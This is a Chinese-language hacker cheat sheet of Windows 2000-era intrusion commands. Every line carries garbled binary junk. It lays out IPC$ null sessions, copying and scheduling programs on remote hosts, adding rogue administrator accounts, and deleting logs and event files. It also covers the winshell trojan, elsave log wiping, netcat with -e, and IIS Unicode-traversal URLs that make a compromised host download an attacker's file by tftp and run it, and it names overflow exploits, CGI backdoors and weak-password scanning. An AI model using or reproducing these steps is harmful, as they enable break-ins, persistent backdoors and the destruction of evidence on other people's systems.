网管和黑客都必须知道的命令
�OyG���"1F 常用的几条NET命令:
�B5am1y{P# .V'V�:;BE% (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
A7�Xn�HPIw �Q�DmYS�Y$ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
#���=�e;?w J�q�U�ADm� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�=(�[��av7 =H5\$&xj4. (查看远程主机时间) net time \\IP地址
dfj\RIV8�� �9l/E��jF^ (定时启动某个程序) at \\IP地址 02:18 readme.exe
gQWd&)'muf ��D%/8{b�: (查看共享) net view \\IP地址
�6v�z�k\n \>�/M� .�2 (查看netbios工作组列表) nbtstat -A IP地址
�����HRa@� T�5lQIr@a� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
x��ycH~ ?� �Z��+:D)�L (这两条把自己增加到管理员组): net user 用户名 密码 /add
[Gr*,nVvB� kMxaz�x�1 net localgroup Administrators 用户名 /add
tJI�,��r_ �w5C*�L)l� (断开连接) net use \\IP地址\ipc$ /delete
F1��azZ�( 3h�a�|0[r9 扫尾:
-�7-[�'fX� )��|#%Czd4 del C:\winnt\system32\logfiles\*.*
_sHK*&W{CT xBn�bF�[� del C:\winnt\ssytem32\config\*.evt
Zf*�r2t1&P ZFh���+x�@ del C:\winnt\system32\dtclog\*.*
�_Tm0�x>EM �N]/!mo�? del C:\winnt\system32\*.log
r8M��Zv�m2 /�i|z�.nNO del C:\winnt\system32\*.txt
':�
�F}3At ��F���w4*� del C:\winnt\*.txt
pa
.K-e)Mu ��sYb�H�|} del C:\winnt\*.log
n�Y?����� }k$�4�/7ri 一、netsvc.exe
��wOgE�|n� S4�NL �"m� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
eo]#sf@\0� 0Ce]V,i6C> netsvc /list \\IP地址
i���k1tidw �n(Y%��Vmy netsvc schedule \\IP地址 /query
h5%|meZQb� �.�5�H�Q
� netsvc \\IP地址 schedule /start
<�!^�
[~`� cSP*f0n,eo 二、OpenTelnet.exe
y7u^zH6wj 9��|r* pK[ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
ilLB�CS��} _uxPx�21g} OpenTelnet \\IP地址 用户名 密码 1 7878
,8I�v9�M}2 ��m 40m<@� 然后就可以telnet到主机的7878端口,进入DOS方式下:
6)RbPPe�E� >���O9��sk telnet IP地址 7878
E�YS��>0Y ]L_�w$�ev' 三、winshell.exe
pR o�s{Uq" {�i{xo2<1" 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�#~ v4caNx �H��.
,;�- p Path (查看winshell主程序的路径信息)
h=VqxG��C& =�5]�n�\"/ b reBoot (重新启动机器)
3����-Bl� �Y��Z}cB� d shutDown (关闭机器)
K\!�#�4>yd C*V��d��-U s Shell (执行后你就会看到可爱的“C:\>”)
l��)8&Ip�� �<�+`(\�� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�,i}|5ozj4 \|�=�mD}�N CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�n$�+M%}/f �J�n}n*�t3 四、3389登陆器,GUI方式登录远程主机的
dJ3��I�Ue {[G`Z9]z&- 五、elsave.exe
$K}.
+`vVO (�'k�<X�Oi 事件日志清除工具
GY!�C�|7kN h^|��5|�l elsave -s \\IP地址 -l "application" -C
E�Yzg�%\HH t��=wXTK5" elsave -s \\IP地址 -l "system" -C
��D�>�e�f 2OBfHO��~D elsave -s \\IP地址 -l "security" -C
�/="HqBI#i (�RL�>Hn;. 执行后成功清除应用程序日志,系统日志,安全日志
�W.}].7}h 9�����t�:] 六、hbulot.exe
�B�R_Ty�kP ��:KE/!]�z 开启win2kserver和winxp的3389服务
+a)E|��(cN )$M�,�Ul� hbulot [/r]
"�c��Ug>a3 i2�,U�,>.� 使用/r表示安装完成后自动重起目标使设置生效。
�m)>&ZIXa T|4s�nU2M� 七、nc.exe(netcat.exe)
�Z�|��6{�T qt�?�*MyfV 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
?��Hz2�-Cn UG�K�aOol. 想要连接到某处: nc [-options] hostname port[s] [ports] ...
���?���bX� }6m�?d�!m 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
m\0cE�1fir |Ur"za;%�@ 参数:
S>:,�z}i� 0&�w0a�P`Y -e prog 程序重定向,一旦连接,就执行 [危险!!]
}�p3b#fAr j
BS4�vvX? -g gateway source-routing hop point[s], up to 8
.(Y6$��[#@ _�^�!vCa7f -G num source-routing pointer: 4, 8, 12, ...
O�pg#*w�%- [�=��M��%� -h 帮助信息
4��jwu'7�Q =���7/�-�i -i secs 延时的间隔
=�
1�|"-�� ~UMOT!�4}3 -l 监听模式,用于入站连接
�t8J/�\f=� ��F@W*\3)� -n 指定数字的IP地址,不能用hostname
'5�.\#=S�1 �}0/a��\�� -o file 记录16进制的传输
5�D`26dB2� @����P�kJY -p port 本地端口号
�v�s9�?+�3 L�k,�+Tfk" -r 任意指定本地及远程端口
M�g�J5B(c ]�#�eh&j�w -s addr 本地源地址
7U��a��7�A CY"i-e"q<Q -u UDP模式
%v��qT#+�x ?[1Si�JT� -v 详细输出——用两个-v可得到更详细的内容
MWwJ�z�VL8 3�(_!`0#F% -w secs timeout的时间
_����n O.- 2<W&\D� o@ -z 将输入输出关掉——用于扫描时
��oN,�s.Of 八、TFTPD32.EXE
'�p�}�`i�/ dk�5�|@?pe 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
Bq��}x9C&< DZ`k[Z.�VZ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
=Viy^ie�N$ �V��|�?WF& 然后可以直接令文件运行:
mU�X�k9X%n Gp2!xK�gm� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�{U �@3yB� 8I#D`yVK�c 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
+<(a}��6dt �&^QPkX@�p 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�Al�X3Wv�} �Ie_I7�Y�J 一、一 Xscan命令行运行参数说明:
y?:dE.5p|� �Y�M�z�BAf 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
/�^<en(0=P !�D:k�!��� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
F�@S�G((�` *@M3p}',�M xscan -file <主机列表文件名> <检测项目> [其他选项]
�/6�tc�Sg) 3'�#%�c>_� 其中<检测项目> 含义如下:
�8� njuDl� aj7dH�5SZl -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
L(o#4YH}>J gA�:TL{�X0 -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
bx;f�`8SN q�u{mqkfN> -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
{*�x�B��m# �ejcwg*��i -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�3��wt���� (2txM"Dja� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
PZOORjF8�A fP���Q|e"? [其他选项] 含义如下:
VXC��4%�� %��$n02�"@ -v: 显示详细扫描进度
dr]�&�kqm i���Jnh$jo -p: 跳过Ping不通的主机
h|W%4|�]R) T��V�k�cDS -o: 跳过没有检测到开放端口的主机
$I�8[BYblB U�Ks$�W�`� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
